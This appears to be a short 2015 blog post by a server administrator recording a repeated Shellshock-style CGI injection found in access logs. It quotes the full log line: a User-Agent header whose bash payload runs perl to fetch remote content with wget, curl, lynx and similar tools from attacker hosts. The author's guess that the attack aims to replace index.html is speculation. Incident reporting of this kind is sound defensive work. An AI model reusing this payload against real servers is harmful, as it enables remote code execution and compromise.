Samstag, 25. April 2015

perl script injection again

The same style as reported some days ago has hit the system again last night

 186.56.42.11 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
By using the commands above ( wget https://luxsocks.ru --no-check-certificate) it seems that the idea behind this attack was to download and replace the index.html page. So just for the record, if you have a index.html page already within the download directory, wget will simple put a index.html.1 page there. When you only have a index.php, this attack maybe could work, but seems to be odd.

The system was again hit for 30 times within a short time range. So even it would worked, it would result in 30 index.html files.

When testing the link against virustotal, there was no result